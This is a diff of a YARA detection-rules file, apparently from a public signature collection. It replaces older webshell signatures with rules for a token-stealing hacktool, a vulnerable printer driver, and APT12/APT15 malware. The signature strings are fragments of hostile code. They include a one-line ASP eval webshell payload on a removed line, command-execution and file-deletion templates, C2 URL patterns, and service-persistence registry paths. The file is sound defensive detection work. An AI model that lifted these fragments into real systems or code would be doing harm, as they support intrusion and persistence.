+		$sequence_11 = { 8b 4d f0 3b 4d 10 0f 8d 90 00 00 00 8b 55 08 03 55 f0 0f b6 02 }
+		$sequence_12 = { 89 4d 14 8b 45 f8 c1 e0 18 8b 4d fc c1 e9 08 0b c1 }
+		$sequence_13 = { 0b c1 89 45 18 8b 55 14 89 55 f8 }
+		$sequence_14 = { 8b 55 14 89 55 f8 8b 45 18 89 45 fc e9 ?? ?? ?? ?? 8b e5 }
 
 	condition:
-		all of them
+		filesize < 1700KB and 7 of them
 }
-rule SIGNATURE_BASE_FSO_S_Indexer_2
+rule SIGNATURE_BASE_HKTL_Koh_Tokenstealer : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file indexer.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8ef79a60-fa8c-51ee-bd87-f5467a66099b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8746-L8757"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project."
+		author = "Will Schroeder (@harmj0y)"
+		id = "76b6cc9f-5db7-5e9b-939c-e713bad8137a"
+		date = "2022-07-09"
+		modified = "2023-12-05"
+		reference = "https://github.com/GhostPack/Koh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hktl_koh_tokenstealer.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "135fc50f85228691b401848caef3be9e"
-		logic_hash = "8cf4c8fb1e985adbed2cf20578fcfc14240f6d9fe6062bbe3fe2f895f58bc172"
+		logic_hash = "e2c4d948e23f1a3a92689f35fedde6e041d09cd88deac9ff3249556be0b8f789"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
+		$x_typelibguid = "4d5350c8-7f8c-47cf-8cde-c752018af17e" ascii
+		$s1 = "[*] Already SYSTEM, not elevating" wide fullword
+		$s2 = "S-1-[0-59]-\\d{2}-\\d{8,10}-\\d{8,10}-\\d{8,10}-[1-9]\\d{2}" wide
+		$s3 = "0x[0-9A-Fa-f]+$" wide
+		$s4 = "\\Koh.pdb" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_Hytop_Devpack_2005
+
+rule SIGNATURE_BASE_VULN_Printerdriver_Privesc_CVE_2021_3438_Jul21 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005.asp"
+		description = "Detects affected drivers with PE timestamps older than the date of the initial report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "963effd9-f31d-5238-9419-b5dd11822e56"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8758-L8771"
+		id = "34cd648a-3e3f-5832-8abe-18507931eb3d"
+		date = "2021-07-20"
+		modified = "2023-12-05"
+		reference = "https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_cve_2021_3438_printdriver.yar#L4-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
-		logic_hash = "b312cddff4c5292cc51acc39448c815fede3c9356d7d225c3a08c7124712b3f8"
-		score = 75
+		logic_hash = "b58c2623c8fb84162c1c9390d0398639061ed5b1d4a8e007685e6fabe42bde54"
+		score = 70
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "7cc9ba2df7b9ea6bb17ee342898edd7f54703b93b6ded6a819e83a7ee9f938b4"
 
 	strings:
-		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
-		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
-		$s9 = "scrollbar-face-color:#E4E4F3;"
+		$s1 = "This String is from Device Driver@@@@@ !!!" ascii
+		$s2 = "\\DosDevices\\ssportc" wide fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of ( $s* ) and 1613606400 >= pe.timestamp
 }
-rule SIGNATURE_BASE__Root_040_Zip_Folder_Deploy
+
+rule SIGNATURE_BASE_APT12_Malware_Aug17 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file deploy.exe"
+		description = "Detects APT 12 Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e592ab2-8a53-59d5-a45d-971398586479"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8772-L8785"
+		id = "6c9cd68f-b839-5c99-a9f5-14c2d8a28bec"
+		date = "2017-08-30"
+		modified = "2023-12-05"
+		reference = "http://blog.macnica.net/blog/2017/08/post-fb81.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt12_malware.yar#L13-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2c9f9c58999256c73a5ebdb10a9be269"
-		logic_hash = "9852b105e6a28f5500fc6739b196dd14b9b0b69b1077be4063735380b0699abb"
+		logic_hash = "0766376689540680f8db699f64aa89fc32ddef619a74864eb816c598b8d08c8a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s5 = "halon synscan 127.0.0.1 1-65536"
-		$s8 = "Obviously you replace the ip address with that of the target."
+		hash1 = "dc7521c00ec2534cf494c0263ddf67ea4ba9915eb17bdc0b3ebe9e840ec63643"
+		hash2 = "42da51b69bd6625244921a4eef9a2a10153e012a3213e8e9877cf831aea3eced"
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "9ba915fd04f248ad62e856c7238c0264" )
 }
-rule SIGNATURE_BASE_By063Cli
+rule SIGNATURE_BASE_APT15_Malware_Mar18_Royalcli : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file by063cli.exe"
+		description = "Detects malware from APT 15 report by NCC Group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b4a4842-e084-53e8-90fb-603ba034b7df"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8786-L8798"
+		id = "165bfa6c-1a8d-5628-8c35-da4e4a2ae04f"
+		date = "2018-03-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/HZ5XMN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L13-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "49ce26eb97fd13b6d92a5e5d169db859"
-		logic_hash = "c89159b73232bc8fd7430b3330009f4b3eb25b9511515bc9b4cd433f7a67f30e"
+		logic_hash = "27fb5e8ff299201d1d13f4a45c401570f76ddfa4c3c1153eff50187170ada06e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
 
 	strings:
-		$s2 = "#popmsghello,are you all right?"
-		$s4 = "connect failed,check your network and remote ip."
+		$s1 = "\\Release\\RoyalCli.pdb" ascii
+		$s2 = "%snewcmd.exe" fullword ascii
+		$s3 = "Run cmd error %d" fullword ascii
+		$s4 = "%s~clitemp%08x.ini" fullword ascii
+		$s5 = "run file failed" fullword ascii
+		$s6 = "Cmd timeout %d" fullword ascii
+		$s7 = "2 %s  %d 0 %d" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_Icyfox007V1_10_Rar_Folder_Asp
+
+rule SIGNATURE_BASE_APT15_Malware_Mar18_Royaldns : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file asp.asp"
+		description = "Detects malware from APT 15 report by NCC Group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52150b6a-2f60-5e6b-86d1-61bc0aeb4fa8"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8799-L8810"
+		id = "c2f519db-2750-53ce-ae18-697ea041faaf"
+		date = "2018-03-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/HZ5XMN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L34-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2c412400b146b7b98d6e7755f7159bb9"
-		logic_hash = "3cc36668f0a2a6807b59c7da0b6e504b519a616ab63fb9f606eba5dc4a9e7e2f"
+		logic_hash = "5d42f48d7d816c0b0ea05145e9dd43b1b2589f3131bf286e1b39c0efaf1c6fac"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
 
 	strings:
-		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
+		$x1 = "del c:\\windows\\temp\\r.exe /f /q" fullword ascii
+		$x2 = "%s\\r.exe" fullword ascii
+		$s1 = "rights.dll" fullword ascii
+		$s2 = "\"%s\">>\"%s\"\\s.txt" fullword ascii
+		$s3 = "Nwsapagent" fullword ascii
+		$s4 = "%s\\r.bat" fullword ascii
+		$s5 = "%s\\s.txt" fullword ascii
+		$s6 = "runexe" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "RunInstallA" ) and pe.exports ( "RunUninstallA" ) ) or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Byshell063_Ntboot_2
+rule SIGNATURE_BASE_APT15_Malware_Mar18_BS2005 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file ntboot.dll"
+		description = "Detects malware from APT 15 report by NCC Group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9bcb401d-619b-54b8-be51-f0e3b6eb096c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8812-L8823"
+		id = "700bbe14-d79e-5a35-aab3-31eacd5bd950"
+		date = "2018-03-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/HZ5XMN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L61-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
-		logic_hash = "25df29000bb410c0ba1fec78920124f6eedbc2585541536239522d2b116270ab"
+		logic_hash = "306903da4ecc9f5bf670d8c49039dee0ce5500c185acaef74786a2c109a4734b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "750d9eecd533f89b8aa13aeab173a1cf813b021b6824bc30e60f5db6fa7b950b"
 
 	strings:
-		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
+		$x1 = "AAAAKQAASCMAABi+AABnhEBj8vep7VRoAEPRWLweGc0/eiDrXGajJXRxbXsTXAcZAABK4QAAPWwAACzWAAByrg==" fullword ascii
+		$x2 = "AAAAKQAASCMAABi+AABnhKv3kXJJousn5YzkjGF46eE3G8ZGse4B9uoqJo8Q2oF0AABK4QAAPWwAACzWAAByrg==" fullword ascii
+		$a1 = "http://%s/content.html?id=%s" fullword ascii
+		$a2 = "http://%s/main.php?ssid=%s" fullword ascii
+		$a3 = "http://%s/webmail.php?id=%s" fullword ascii
+		$a9 = "http://%s/error.html?tab=%s" fullword ascii
+		$s1 = "%s\\~tmp.txt" fullword ascii
+		$s2 = "%s /C %s >>\"%s\" 2>&1" fullword ascii
+		$s3 = "DisableFirstRunCustomize" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_U_Uay
+rule SIGNATURE_BASE_APT15_Malware_Mar18_Msexchangetool : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file uay.exe"
+		description = "Detects malware from APT 15 report by NCC Group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a670e19-6e53-5b13-aabf-fe74d48b9113"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8824-L8836"
+		id = "81b826b6-8c2e-5a8a-a626-9515d40dbbb0"
+		date = "2018-03-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/HZ5XMN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L89-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
-		logic_hash = "45e8938ce34fd5a253cee3867aa8c4429c6bf3fcc91098ed9df3f95656bc5f8f"
+		logic_hash = "4e9e29bc69383ab6248241622394afddde6e18032ed6e2b64575362773f25a94"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "16b868d1bef6be39f69b4e976595e7bd46b6c0595cf6bc482229dbb9e64f1bce"
 
 	strings:
-		$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
-		$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
+		$s1 = "\\Release\\EWSTEW.pdb" ascii
+		$s2 = "EWSTEW.exe" fullword wide
+		$s3 = "Microsoft.Exchange.WebServices.Data" fullword ascii
+		$s4 = "tmp.dat" fullword wide
+		$s6 = "/v or /t is null" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_Bin_Wuaus
+rule SIGNATURE_BASE_Clean_Apt15_Patchedcmd : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file wuaus.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "50b5323b-d8d1-5350-bf93-8dde3d11fd87"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "This is a patched CMD. This is the CMD that RoyalCli uses."
+		author = "Ahmed Zaki"
+		id = "c6867ad4-f7f2-5d63-bffd-07599ede635d"
+		date = "2018-03-12"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8837-L8853"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L118-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "46a365992bec7377b48a2263c49e4e7d"
-		logic_hash = "0509ca39662430c3ababf65ca3a6e9af95250163980829d90eddf5341168c864"
+		hash = "90d1f65cfa51da07e040e066d4409dc8a48c1ab451542c894a623bc75c14bf8f"
+		logic_hash = "08a68e14793d2f44ee75e49a43521c7d8bc1fc5ddd005e1fb71cc844966e16ba"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s1 = "9(90989@9V9^9f9n9v9"
-		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
-		$s3 = ";(=@=G=O=T=X=\\="
-		$s4 = "TCP Send Error!!"
-		$s5 = "1\"1;1X1^1e1m1w1~1"
-		$s8 = "=$=)=/=<=Y=_=j=p=z="
+		$ = "eisableCMD" wide
+		$ = "%WINDOWS_COPYRIGHT%" wide
+		$ = "Cmd.Exe" wide
+		$ = "Windows Command Processor" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Pwreveal
+rule SIGNATURE_BASE_Malware_Apt15_Royalcli_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file pwreveal.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3d79dd13-9012-56e2-b42a-e6b3e204c601"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Generic strings found in the Royal CLI tool"
+		author = "David Cannings"
+		id = "432c09bf-3c44-5a2c-ba69-7b4fe7eb43cc"
+		date = "2018-03-12"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8854-L8868"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L133-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b4e8447826a45b76ca45ba151a97ad50"
-		logic_hash = "01c9582897c65e608d49a151fe9ade97b9a031d7d10f5fd4b4d0c2a3fd83e7b6"
+		hash = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
+		logic_hash = "3cc0cd81db58e20fbf31fbd9fe65d113b7160e7d2b6739c01987d9e317099b9b"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "*<Blank - no es"
-		$s3 = "JDiamondCS "
-		$s8 = "sword set> [Leith=0 bytes]"
-		$s9 = "ION\\System\\Floating-"
+		$ = "%s~clitemp%08x.tmp" fullword
+		$ = "%s /c %s>%s" fullword
+		$ = "%snewcmd.exe" fullword
+		$ = "%shkcmd.exe" fullword
+		$ = "%s~clitemp%08x.ini" fullword
+		$ = "myRObject" fullword
+		$ = "myWObject" fullword
+		$ = "2 %s  %d 0 %d\x0D\x0A"
+		$ = "2 %s  %d 1 %d\x0D\x0A"
+		$ = "%s file not exist" fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Xwhois
+rule SIGNATURE_BASE_Malware_Apt15_Royalcli_2 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file xwhois.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8f3b3bb2-5884-584a-8220-b6edbfebc8a3"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "APT15 RoyalCli backdoor"
+		author = "Nikolaos Pantazopoulos"
+		id = "d4acfd2d-385d-5063-898e-d339b50733eb"
+		date = "2018-03-12"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8869-L8883"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L154-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0bc98bd576c80d921a3460f8be8816b4"
-		logic_hash = "75ee56dae5fde75ae4dc4bba835a96016781b747f3cff0dc6d52e665463a6070"
+		logic_hash = "c57ae92ba84355652cd56c8eaad3f277a8f514f8d078f053f3e8208b8bec535f"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s1 = "rting! "
-		$s2 = "aTypCog("
-		$s5 = "Diamond"
-		$s6 = "r)r=rQreryr"
+		$string1 = "%shkcmd.exe" fullword
+		$string2 = "myRObject" fullword
+		$string3 = "%snewcmd.exe" fullword
+		$string4 = "%s~clitemp%08x.tmp" fullword
+		$string6 = "myWObject" fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule SIGNATURE_BASE_Vanquish_2
+rule SIGNATURE_BASE_Malware_Apt15_Royaldll
 {
 	meta:
-		description = "Webshells Auto-generated - file vanquish.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6736cad6-cba1-5b6f-ae05-e2b980280479"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "DLL implant, originally rights.dll and runs as a service"
+		author = "David Cannings"
+		id = "26baef92-1055-56dc-b274-e2a6bc05d85b"
+		date = "2018-03-12"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8884-L8895"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L196-L243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2dcb9055785a2ee01567f52b5a62b071"
-		logic_hash = "428dc4e6d8bcc888e6f99f69ee9f211aa029d3486b99b9716d09709dc391d9a2"
+		hash = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
+		logic_hash = "2ed0d38993a072da189f02233bd7cc0bf1be02e926f687db224f52de9b3a44fc"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Vanquish - DLL injection failed:"
+		$opcodes_jshash = { B8 A7 C6 67 4E 83 C1 02 BA 04 00 00 00 57 90 }
+		$opcodes_encode = { 0F B6 1C 03 8B 55 08 30 1C 17 47 3B 7D 0C }
+		$opcodes_sleep_loop = { 68 (88|B8) (13|0B) 00 00 FF D6 4F 75 F6 }
+		$ = "Nwsapagent" fullword
+		$ = "\"%s\">>\"%s\"\\s.txt"
+		$ = "myWObject" fullword
+		$ = "del c:\\windows\\temp\\r.exe /f /q"
+		$ = "del c:\\windows\\temp\\r.ini /f /q"
 
 	condition:
-		all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Down_Rar_Folder_Down
+
+rule SIGNATURE_BASE_Malware_Apt15_Royaldll_2 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file down.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4e0a0e03-4f01-5b58-807c-0934cdda77ab"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "DNS backdoor used by APT15"
+		author = "Ahmed Zaki"
+		id = "3bc546a5-38b9-5504-b09e-305ba7bbd6bc"
+		date = "2018-03-12"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8896-L8907"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L245-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "db47d7a12b3584a2e340567178886e71"
-		logic_hash = "bc666d6333d49a2b01553e1946fc304195193b9be92e26805474e64da61455da"
+		hash = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
+		logic_hash = "94e2b61ff19b1377f461203cb22c607e718683691e54a3de3ed32bf6ed2897fa"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
+		$ = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" wide ascii
+		$ = "netsvcs" wide ascii fullword
+		$ = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" wide ascii fullword
+		$ = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
+		$ = "myWObject" wide ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them and pe.exports ( "ServiceMain" ) and filesize > 50KB and filesize < 600KB
 }
-rule SIGNATURE_BASE_Cmdshell
+rule SIGNATURE_BASE_Malware_Apt15_Exchange_Tool : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file cmdShell.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "be256fc4-8dc5-58e4-9ca2-5a1df936b8dd"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "This is a an exchange enumeration/hijacking tool used by an APT 15"
+		author = "Ahmed Zaki"
+		id = "f07b9537-0741-51c8-a9fa-836430fe4855"
+		date = "2018-03-12"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8908-L8919"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L263-L283"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8a9fef43209b5d2d4b81dfbb45182036"
-		logic_hash = "5e7c7537b355b162d58b8bce570b1f94a8e6b479856685a245ffaed8f9482680"
+		hash = "d21a7e349e796064ce10f2f6ede31c71"
+		logic_hash = "e7b5ac97f3dcf125e64001be53aca73ee19c1be8b192a762f231106c47f76867"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s1 = "if cmdPath=\"wscriptShell\" then"
+		$s1 = "subjectname" fullword
+		$s2 = "sendername" fullword
+		$s3 = "WebCredentials" fullword
+		$s4 = "ExchangeVersion" fullword
+		$s5 = "ExchangeCredentials" fullword
+		$s6 = "slfilename" fullword
+		$s7 = "EnumMail" fullword
+		$s8 = "EnumFolder" fullword
+		$s9 = "set_Credentials" fullword
+		$s18 = "/v or /t is null" wide
+		$s24 = "2013sp1" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Nc
+rule SIGNATURE_BASE_Malware_Apt15_Generic
 {
 	meta:
-		description = "Webshells Auto-generated - file nc.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "106209fc-f957-5131-825b-8eb7835625e0"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Find generic data potentially relating to AP15 tools"
+		author = "David Cannings"
+		id = "4eb50731-22df-5f7a-bf5f-166ef84cf8b5"
+		date = "2018-03-12"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8920-L8934"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L285-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
-		logic_hash = "6106758aedb33f8983f387a58fcd815c47f793cd2a7ea3b0ebed13dd1d5b6e83"
